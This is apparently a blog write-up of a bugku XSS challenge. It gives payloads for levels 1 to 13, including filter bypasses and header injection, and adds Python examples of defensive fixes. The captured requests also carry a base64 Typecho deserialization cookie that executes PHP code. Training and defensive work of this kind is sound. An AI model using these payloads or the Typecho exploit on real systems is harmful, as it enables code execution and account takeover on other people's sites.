Sky's blog

XSS Challenge Journey - bugku

Word count: 490 Reading time: 3 min
2017/09/08

Preface

Challenge URL: http://120.24.86.145:8002/test/
Browser used: Firefox

level-1

payload:

<script>alert(1)</script>

level-2

payload:

"><script>alert(1)</script>

level-3

payload:

' onmouseover='alert(1)

level-4

payload:

" onmouseover="alert(1)

level-5

payload:

"><a href="javascript:alert(1)">aa</a>//

level-6

payload:

"><a Href="javascript:alert(1)">aa</a>//

level-7

payload:

"><a Hrhrefef="javascscriptript:alert(1)">aa</a>//

level-8

payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;
&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;

level-9

payload:

&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;alert('http://')
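Levels 7 to 9 all turn on the same mistake: the filter inspects the raw parameter, while the browser first decodes HTML character references in the attribute value and only then reads the URL scheme, so an entity-encoded `javascript:` slips past a keyword check (and, for level 9, still contains the required `http://` inside the argument). The defensive fix is to normalize the value the way the browser will and then allowlist the scheme, which also makes the single-pass keyword removal that level 7 defeats unnecessary. The following Python is an added example written for this post, not code from the challenge or from bugku; `keyword_blacklist_accepts` is my assumption of what the level-8/9 filter does, and the `require_http` parameter and `render_link` helper are mine.

```python
import html
import re
from urllib.parse import urlsplit

# Test inputs constructed from the payloads quoted in the level-7 to level-9
# write-ups above, plus one ordinary URL taken from the post.
LEVEL7_SPLIT_KEYWORD = "javascscriptript:alert(1)"
LEVEL8_ENTITY_ENCODED = (
    "&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;"
    "&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0031;&#x0029;"
)
LEVEL9_WITH_HTTP = (
    "&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;"
    "alert('http://')"
)
ORDINARY_URL = "http://120.24.86.145:8002/test/"

ALLOWED_SCHEMES = {"http", "https"}


def keyword_blacklist_accepts(url: str, require_http: bool = False) -> bool:
    """Weak check modelled on what levels 8 and 9 appear to do (an assumption,
    not the challenge's real source): look for a literal keyword in the raw
    input, optionally also demanding that 'http://' appears somewhere."""
    raw = url.lower()
    if "script" in raw:
        return False
    return "http://" in raw if require_http else True


def browser_normalize(url: str) -> str:
    """Undo what the browser undoes before it reads the scheme: decode HTML
    character references (an attribute value is HTML first), strip leading and
    trailing C0 controls and spaces, and remove tab/CR/LF anywhere, as the
    WHATWG URL parser does."""
    decoded = html.unescape(url)
    decoded = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", decoded)
    return re.sub(r"[\t\r\n]", "", decoded)


def is_safe_href(url: str) -> bool:
    """Allowlist the scheme of the *normalized* URL. Anything else, including
    scheme-less relative references, is refused here for simplicity."""
    scheme = urlsplit(browser_normalize(url)).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def render_link(href: str, text: str) -> str:
    """Emit an <a> only with an allowlisted href; a refused href is replaced by
    a harmless fragment link instead of being 'cleaned' with string removal."""
    safe_href = href if is_safe_href(href) else "#"
    return '<a href="{}">{}</a>'.format(
        html.escape(safe_href, quote=True), html.escape(text)
    )


if __name__ == "__main__":
    for sample in (LEVEL7_SPLIT_KEYWORD, LEVEL8_ENTITY_ENCODED, LEVEL9_WITH_HTTP, ORDINARY_URL):
        print(
            f"blacklist={keyword_blacklist_accepts(sample, require_http=True)!s:5} "
            f"allowlist={is_safe_href(sample)!s:5} normalized={browser_normalize(sample)}"
        )
```

Running it shows the two entity-encoded payloads passing the keyword blacklist and failing the scheme allowlist, because the decision is taken on the decoded string the browser will actually act on; `render_link` then never needs to know what `script` looks like.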

level-10

payload:

http://120.24.86.145:8002/test/level10.php?keyword=well done!&t_sort=8888" 
type="text" onmouseover="alert(666)

level-11

The injection point is the Referer header; the same payload as before.
payload:

GET /test/level11.php?keyword=11111 HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 8888" type="text" onmouseover="alert(666)
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-12

The injection point is the User-Agent header; the same payload as before.
payload:

GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: 8888" type="text" onmouseover="alert(666)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level11.php?keyword=11111
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-13

The injection point is the cookie; the same payload as before.
payload:

GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level12.php?keyword=good%20job!
Accept-Language: zh-CN,zh;q=0.8
Cookie: user=8888" type="text" onmouseover="alert(666); __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close
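Levels 10 to 13 are one bug in four places: a request value (the `t_sort` parameter, then Referer, User-Agent and a cookie) is written into the `value` attribute of a hidden input without encoding, so the `"` in the payload closes the attribute and `type="text" onmouseover="..."` becomes new attributes. Request headers are attacker-controlled exactly like query parameters, and the fix is the same: encode for the attribute context at the point of output. The Python below is an added example for this post, not the challenge's PHP; `render_hidden_input_unsafe` is my reconstruction of the vulnerable pattern, and the field names and the parsing helper are mine. It uses the standard-library HTML parser to confirm, rather than eyeball, that the encoded value stays inside one attribute.

```python
import html
from html.parser import HTMLParser

# Payload quoted from the level-10 to level-13 write-ups above (constructed test input).
HEADER_PAYLOAD = '8888" type="text" onmouseover="alert(666)'


def render_hidden_input_unsafe(name: str, value: str) -> str:
    """Vulnerable pattern implied by levels 10-13 (an assumption about the
    challenge source): the request value is interpolated without encoding."""
    return f'<input name="{name}" value="{value}" type="hidden">'


def render_hidden_input(name: str, value: str) -> str:
    """Hardened form: encode both the name and the value for an HTML attribute
    context. quote=True turns '"' into '&quot;', so the value cannot end the
    attribute early."""
    return '<input name="{}" value="{}" type="hidden">'.format(
        html.escape(name, quote=True), html.escape(value, quote=True)
    )


def echo_request_headers(headers: dict) -> str:
    """Reflect Referer, User-Agent and Cookie into hidden fields the way the
    challenge pages do, but through the encoding renderer. Field names are
    my own choice, not the challenge's."""
    fields = {"t_ref": "Referer", "t_ua": "User-Agent", "t_cook": "Cookie"}
    return "\n".join(
        render_hidden_input(field, headers.get(header, ""))
        for field, header in fields.items()
    )


class _AttrCollector(HTMLParser):
    """Collect (tag, [(attr, value), ...]) for every start tag, keeping
    duplicates so a smuggled second 'type' attribute is visible."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, list(attrs)))


def parse_attrs(markup: str) -> list:
    """Return the parsed start tags of the markup; attribute values are
    entity-decoded by the parser, as a browser would decode them."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def has_event_handler(markup: str) -> bool:
    """True if any parsed start tag carries an on* attribute, the symptom the
    levels above exploit."""
    return any(
        attr.lower().startswith("on")
        for _, attrs in parse_attrs(markup)
        for attr, _ in attrs
    )


if __name__ == "__main__":
    # Constructed request mirroring the level-11 to level-13 captures above.
    request = {
        "Referer": HEADER_PAYLOAD,
        "User-Agent": HEADER_PAYLOAD,
        "Cookie": "user=" + HEADER_PAYLOAD,
    }
    print(render_hidden_input_unsafe("t_sort", HEADER_PAYLOAD))
    print(render_hidden_input("t_sort", HEADER_PAYLOAD))
    print(echo_request_headers(request))
    print("handler in unsafe:", has_event_handler(render_hidden_input_unsafe("t_sort", HEADER_PAYLOAD)))
    print("handler in safe:  ", has_event_handler(echo_request_headers(request)))
```

The parser check is the useful part for a reviewer: in the unsafe rendering the one input carries five attributes, including `onmouseover` and a second `type`, while the encoded rendering parses back to exactly three attributes with `value` equal to the original payload byte for byte, which is what "the data stays data" means in practice.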

level-14

level-15

level-16

level-17

level-18

level-19

level-20
